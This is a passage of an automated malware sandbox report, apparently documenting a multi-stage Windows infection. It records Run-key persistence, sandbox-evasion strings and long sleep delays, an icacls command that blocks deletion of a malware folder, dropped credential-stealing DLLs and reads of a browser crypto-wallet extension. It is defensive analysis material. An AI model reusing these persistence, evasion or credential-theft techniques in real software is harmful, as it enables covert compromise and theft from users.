                Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                Source: C:\Users\user\AppData\Local\Temp\D804.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run SysHelperJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\D804.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run SysHelperJump to behavior

                Hooking and other Techniques for Hiding and Protection

                barindex
                Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 30303
                Source: unknownNetwork traffic detected: HTTP traffic on port 30303 -> 49734
                Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 30303
                Source: unknownNetwork traffic detected: HTTP traffic on port 30303 -> 49734
                Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 30303
                Source: unknownNetwork traffic detected: HTTP traffic on port 30303 -> 49734
                Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 30303
                Source: unknownNetwork traffic detected: HTTP traffic on port 30303 -> 49885
                Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 30303
                Source: unknownNetwork traffic detected: HTTP traffic on port 30303 -> 49885
                Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 30303
                Source: unknownNetwork traffic detected: HTTP traffic on port 30303 -> 49885
                Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 30303
                Source: unknownNetwork traffic detected: HTTP traffic on port 30303 -> 49905
                Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 30303
                Source: unknownNetwork traffic detected: HTTP traffic on port 30303 -> 49905
                Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 30303
                Source: unknownNetwork traffic detected: HTTP traffic on port 30303 -> 49905
                Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 30303
                Source: unknownNetwork traffic detected: HTTP traffic on port 30303 -> 49927
                Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 30303
                Source: unknownNetwork traffic detected: HTTP traffic on port 30303 -> 49927
                Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 30303
                Source: unknownNetwork traffic detected: HTTP traffic on port 30303 -> 49927
                Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 30303
                Source: unknownNetwork traffic detected: HTTP traffic on port 30303 -> 49949
                Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 30303
                Source: unknownNetwork traffic detected: HTTP traffic on port 30303 -> 49949
                Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 30303
                Source: unknownNetwork traffic detected: HTTP traffic on port 30303 -> 49949
                Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 30303
                Source: unknownNetwork traffic detected: HTTP traffic on port 30303 -> 49973
                Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 30303
                Source: unknownNetwork traffic detected: HTTP traffic on port 30303 -> 49973
                Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 30303
                Source: unknownNetwork traffic detected: HTTP traffic on port 30303 -> 49973
                Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 30303
                Source: unknownNetwork traffic detected: HTTP traffic on port 30303 -> 50001
                Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 30303
                Source: unknownNetwork traffic detected: HTTP traffic on port 30303 -> 50001
                Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 30303
                Source: unknownNetwork traffic detected: HTTP traffic on port 30303 -> 50001
                Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 30303
                Source: unknownNetwork traffic detected: HTTP traffic on port 30303 -> 50027
                Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 30303
                Source: unknownNetwork traffic detected: HTTP traffic on port 30303 -> 50027
                Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 30303
                Source: unknownNetwork traffic detected: HTTP traffic on port 30303 -> 50027
                Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 30303
                Source: unknownNetwork traffic detected: HTTP traffic on port 30303 -> 50032
                Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 30303
                Source: unknownNetwork traffic detected: HTTP traffic on port 30303 -> 50032
                Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 30303
                Source: unknownNetwork traffic detected: HTTP traffic on port 30303 -> 50032
                Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\01860199.exeJump to behavior
                Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\hwgujdv:Zone.Identifier read attributes | delete
                Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\ewgujdv:Zone.Identifier read attributes | delete
                Source: C:\Users\user\AppData\Local\Temp\D804.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                Source: C:\Users\user\AppData\Local\Temp\3C54.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                Source: C:\Users\user\AppData\Local\Temp\B46F.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\D804.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\D804.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\3C54.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\3C54.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\3C54.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\3C54.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\3C54.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\3C54.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\3C54.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\3C54.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\3C54.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\3C54.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\3C54.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\3C54.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\3C54.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\NewPlayer.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\B46F.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\B46F.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\B46F.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\B46F.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\B46F.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\B46F.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\B46F.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\B46F.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\B46F.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\B46F.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\B46F.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\B46F.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\A170.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\A170.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\A170.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\A170.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\913F.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\5DA0.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\5DA0.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\5DA0.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\5DA0.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\5DA0.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\5DA0.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\5DA0.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\5DA0.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\5DA0.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\5DA0.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\5DA0.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\5DA0.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\5DA0.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Source: 3C54.exe, 00000014.00000000.455817498.00000000004A2000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: SBIEDLL.DLL/
                Source: 01860199.exe, 00000000.00000002.379986606.000000000084A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOK<
                Source: C:\Users\user\Desktop\01860199.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\Desktop\01860199.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\Desktop\01860199.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\Desktop\01860199.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\Desktop\01860199.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\Desktop\01860199.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Roaming\hwgujdvKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Roaming\hwgujdvKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Roaming\hwgujdvKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Roaming\hwgujdvKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Roaming\hwgujdvKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Roaming\hwgujdvKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Local\Temp\F4F7.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Local\Temp\F4F7.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Local\Temp\F4F7.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Local\Temp\F4F7.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Local\Temp\F4F7.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Local\Temp\F4F7.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Windows\explorer.exe TID: 3492Thread sleep time: -1020000s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\D804.exe TID: 3728Thread sleep time: -1200000s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\3C54.exe TID: 4124Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\aafg31.exe TID: 6964Thread sleep time: -300000s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exe TID: 5232Thread sleep time: -900000s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exe TID: 6924Thread sleep time: -50000s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exe TID: 6948Thread sleep time: -360000s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exe TID: 6972Thread sleep time: -1440000s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exe TID: 6948Thread sleep time: -180000s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exe TID: 5232Thread sleep time: -30000s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe TID: 6340Thread sleep count: 129 > 30
                Source: C:\Windows\explorer.exeLast function: Thread delayed
                Source: C:\Users\user\AppData\Local\Temp\aafg31.exeLast function: Thread delayed
                Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exeLast function: Thread delayed
                Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exeLast function: Thread delayed
                Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exeLast function: Thread delayed
                Source: C:\Users\user\AppData\Local\Temp\D804.exeThread delayed: delay time: 1200000
                Source: C:\Users\user\AppData\Local\Temp\3C54.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Local\Temp\aafg31.exeThread delayed: delay time: 300000
                Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exeThread delayed: delay time: 180000
                Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exeThread delayed: delay time: 360000
                Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exeThread delayed: delay time: 180000
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 417
                Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 756
                Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 766
                Source: C:\Users\user\AppData\Local\Temp\D804.exeDropped PE file which has not been started: C:\Users\user\Downloads\ChromeSetup.exe.vapo (copy)
                Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\07c6bc37dc5087\cred64.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\D804.exeDropped PE file which has not been started: C:\Users\user\Downloads\ChromeSetup.exe
                Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3E02.exeJump to dropped file
                Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\57DC.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\D804.exeCode function: 5_2_024A671C rdtsc
                Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exeRegistry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                Source: C:\Users\user\AppData\Local\Temp\D804.exeThread delayed: delay time: 1200000
                Source: C:\Users\user\AppData\Local\Temp\3C54.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Local\Temp\aafg31.exeThread delayed: delay time: 300000
                Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exeThread delayed: delay time: 30000
                Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exeThread delayed: delay time: 50000
                Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exeThread delayed: delay time: 180000
                Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exeThread delayed: delay time: 360000
                Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exeThread delayed: delay time: 180000
                Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exeThread delayed: delay time: 30000
                Source: C:\Users\user\AppData\Local\Temp\D804.exeCode function: 5_2_00403870 GetStringTypeExA,FindFirstVolumeMountPointW,GetPrivateProfileIntA,WaitForSingleObject,FreeConsole,GetConsoleCursorInfo,GetModuleFileNameW,EnumFontsW,GetConsoleCursorInfo,GetModuleFileNameW,EnumFontsW,GetVersionExW,GetConsoleAliasesLengthA,SleepEx,CreateFileMappingW,CreateMutexA,GetCommState,FreeConsole,MapGenericMask,DebugBreak,AttachConsole,MapGenericMask,DebugBreak,FreeConsole,AttachConsole,FreeConsole,InterlockedExchangeAdd,WaitForMultipleObjectsEx,GetCharWidthW,GetCharABCWidthsFloatW,GetCharWidthW,GetCharABCWidthsFloatW,GetLastError,GetLastError,ReplaceFileA,WritePrivateProfileStringW,lstrcmpiW,CreateEventW,ReplaceFileA,WritePrivateProfileStringW,lstrcmpiW,CreateEventW,MulDiv,CreateActCtxA,GetFileAttributesExW,GetLogicalDriveStringsA,MulDiv,CreateActCtxA,GetFileAttributesExW,GetLogicalDriveStringsA,GetLongPathNameA,WritePrivateProfileStructW,IsBadReadPtr,CancelWaitableTimer,GetFileType,GetModuleHandleA,
                Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
                Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
                Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
                Source: aafg31.exe, 00000015.00000003.485059541.000001E290193000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 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